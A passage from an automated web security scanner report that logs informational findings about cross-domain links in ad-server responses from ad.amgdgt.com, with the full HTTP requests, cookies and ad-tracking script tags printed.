wMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDV3NBQ0JNZ0NoZExQQ3FnREFlZ0R2QUhvQTVRQzlRTUFBQURFZ0Fib3Q4NnF3WTZ5aHRFQiZudW09MSZzaWc9QUdpV3F0d0t3Mk5TcHNCdXo3X2dyWF83b1diOTlKdzUxdyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
QUNCTWdDaGRMUENxZ0RBZWdEdkFIb0E1UUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHdLdzJOU3BzQnV6N19nclhfN29XYjk5Snc1MXcmY2xpZW50PWNhLXB1Yi02ODg4MDY1NjY4MjkyNjM4JmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=1534348375" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=896531071" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.5. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=45832566427998250&clkurl=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdArgyqDU5E6D-uDKoNTkToP99ronZfgYdlSsYda6b2ziXvT7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAPQ8BAgUCAAQAAAAA8CIKmgAAAAA./cnd=!Qg9ejQiQmQMQxskKGAAg0ccBKEsxERukQU1E6D9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAWAt70-0TajcL6K7sQe2vMHtC9fq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyvwLF7MoEVJ26YNwSnGTXHBTcukg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680578&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662578710&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662578715&frm=1&adk=2614322350&ga_vid=1466159819.1303662579&ga_sid=1303662579&ga_hid=97024423&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUWF_DD0u2mL445Kc9YoToMfDv8fQDA3gBY2BgEGZg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36H34QQnHKuDRxQuTagvu9AfS5wfRLut3Hqk7DTxqWv_eTOTbj0tZ.cUYtT7oTwYpxyxxY8wil39KsgTrkZC9hxy9m24pSb_tATt1zHStxypro45abdVMQpV1nmy8A0OZSB1eEJA6NOHgPDR6H_QACKv_wAxmoGJn8bBpYX3gyMWkwMDJeeweIoTXlWEFDOCirHCJR7AJdTklIHshlx29ktBJRn8N2cwcDAAUwsOxmBihkCbzEyASkGA0YGAQYGBTOw4NICsCBLJiMrUI4lhImVkQ3IkN_FyMAFT2MgwxgAToqJtQ--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUT9qLjz2Zm9NiEFg3paXYGLcX2UIDA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo35HhNc1nHJ.E0Jwyrk2cEDl2oBmfgea6QI3U8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8GZgmhzKwOjxhYNTJY2D4KPQfCEBxmx_AWM3A5G_DwPLCm4FRi4mB4dIzWBylKc8KAspZQeUYgXIP4HJKUupANiNuO7uFgPIMvpszGBg4gAlpJyNQMUPgLUYmIMVgwMggyMCgYAYWXFoAFmTJZGQFyrGEMLEysgEZ8rsYGbig6e86yCwGBgAWjZB.; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 16:29:38 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4055
Date: Sun, 24 Apr 2011 16:29:37 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1827594393?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUqGt7rLogJrjJsgIfEZCuWJKDi4lnZW8sdXNhLHQsMTMwMzY2MjU3ODM5MSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL21wbVptWm1adVQtYW1abVptWm01UHdBQUFFQXpNd2RBcmd5cURVNUU2RC11REtvTlRrVG9QOTlyb25aZmdZZGxTc1lkYTZiMnppWHZUN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQVBROEJBZ1VDQUFRQUFBQUE4Q0lLbWdBQUFBQS4vY25kPSFRZzllalFpUW1RTVF4c2tLR0FBZzBjY0JLRXN4RVJ1a1FVMUU2RDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJBV0F0NzAtMFRhamNMNks3c1FlMnZNSHRDOWZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTR2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjlpTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkaE5tUTBZcGdDWk1BQ0JNZ0NoZExQQ3FnREFlZ0R2QUhvQTVRQzlRTUFBQURFZ0Fib3Q4NnF3WTZ5aHRFQiZudW09MSZzaWc9QUdpV3F0eXZ3TEY3TW9FVkoyNllOd1NuR1RYSEJUY3VrZyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
QUNCTWdDaGRMUENxZ0RBZWdEdkFIb0E1UUM5UU1BQUFERWdBYm90ODZxd1k2eWh0RUImbnVtPTEmc2lnPUFHaVdxdHl2d0xGN01vRVZKMjZZTndTbkdUWEhCVGN1a2cmY2xpZW50PWNhLXB1Yi02ODg4MDY1NjY4MjkyNjM4JmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=1827594393" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=927408272" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.6. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUknmntfmI4gkEaJqB02eiFjl3sHgDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMbAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GEGKFMwYGYCCjPrtWZknIfoBAsMbMQ--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUBmuE9vQaUZPvGEt_WOLrL1FD0BkDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357TVwyA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAGbyFK; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:29:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4062
Date: Sun, 24 Apr 2011 12:29:24 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1348722381?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUMYF47AywqCVZa27Wxox.OACEyAZnZW8sdXNhLHQsMTMwMzY0ODE2NTQ3NixjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
QUlFeUFLRjBzOEtxQU1CNkFPOEFlZ0RsQUwxQXdBQUFNU0FCdWkzenFyQmpyS0cwUUUmbnVtPTEmc2lnPUFHaVdxdHpYRURhZGRwZm1pNDFmekZoSlhZejJobjVPMEEmY2xpZW50PWNhLXB1Yi02ODg4MDY1NjY4MjkyNjM4JmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=1348722381" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=45312426" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.7. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=23590900609269740&clkurl=http://ib.adnxs.com/click/KVyPwvUo3D8pXI_C9SjcPwAAAEAzMwdA-yE2WDiJ9T_7ITZYOIn1P5sh1rsNl6JOSsYda6b2ziWKP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAvA8BAgUCAAQAAAAAlSLaQwAAAAA./cnd=!rxFGFgiQmQMQxskKGAAg0ccBKEsx_5TyvDiJ9T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB6NSjij-0TZz1AoqGlgeeu_m4A9fq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYArgDwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzghi4ziRoyAyYDhZkLYBiHzlX2Ow%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658381013&bpp=8&shv=r20110420&jsv=r20110415&correlator=1303658381040&frm=1&adk=2614322350&ga_vid=1758512325.1303658381&ga_sid=1303658381&ga_hid=1384201995&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=32
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUJkj0tjnVs6ZlxPKJLhIj3dCVZY8DA3gBY2Bg4Gdg6lzCwJLdxsDI.52B4YYLAwMDJwMDo377yZ2boHItQLmfQDk3hNyMWpxyJ4QX45Q7tuARTrmjXwVxys1YwI5bzrYVp9z0h5645TpW4pYz1cUpN.2mIk65yjJfBqbJoQysDk8YGHXyGBg.Cv0HAlB45gcwVjMw.dswsLzwZmDUYmJguPQMFp5pyrOCgHJWUDlGoNwDuJySlDqQzYjbzm4hoDyD7.YMBgYOYOTtZAQqZgi8xcgEpBgMGBl4GBgUzMCCSwvAgiyZjKxAOZYQJlZGNiBDfhcjAzs8zkGGMQAAIjhy0w--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUI2s0JMGhZPIDYO0t7dlEyAtu1iADA3gBY2BgEGBg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo36HhJ02VK4NKPcdKOcCk2s_uXMTLn3tJ2fU4pQ7IbwYp9yxBY9wyh39KohTbsYCdtxytq045aY_9MQt17ESt5ypLk65aTcVccpVlvkyME0OZWB1eMLAqJPHwPBR6D8QgMI6P4CxmoHJ34aB5YU3A6MWEwPDpWewsE5TnhUElLOCyjEC5R7A5ZSk1IFsRtx2dgsB5Rl8N2cwMHAAI3YnI1AxQ.AtRiYgxWDAyMDLwKBgBhZcWgAWZMlkZAXKsYQwsTKyARnyuxgZ2OHpAWQYAwD8zXas; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 15:19:40 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4063
Date: Sun, 24 Apr 2011 15:19:39 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732016/direct/01/rnd=1451138540?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU6NCLQDiYTAgBdSvSzXm6spUaEepnZW8sdXNhLHQsMTMwMzY1ODM4MDg0MyxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0tWeVB3dlVvM0Q4cFhJX0M5U2pjUHdBQUFFQXpNd2RBLXlFMldEaUo5VF83SVRaWU9JbjFQNXNoMXJzTmw2Sk9Tc1lkYTZiMnppV0tQN1JOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQXZBOEJBZ1VDQUFRQUFBQUFsU0xhUXdBQUFBQS4vY25kPSFyeEZHRmdpUW1RTVF4c2tLR0FBZzBjY0JLRXN4XzVUeXZEaUo5VDlDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUI2TlNqaWotMFRaejFBb3FHbGdlZXVfbTRBOWZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXJnRHdBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0emdoaTR6aVJveUF5WURoWmtMWUJpSHpsWDJPdyZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
QUlFeUFLRjBzOEtxQU1CNkFPOEFlZ0RsQUwxQXdBQUFNU0FCdWkzenFyQmpyS0cwUUUmbnVtPTEmc2lnPUFHaVdxdHpnaGk0emlSb3lBeVlEaFprTFlCaUh6bFgyT3cmY2xpZW50PWNhLXB1Yi02ODg4MDY1NjY4MjkyNjM4JmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732016/direct/01/rnd=1451138540" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=286380400" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

23.8. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

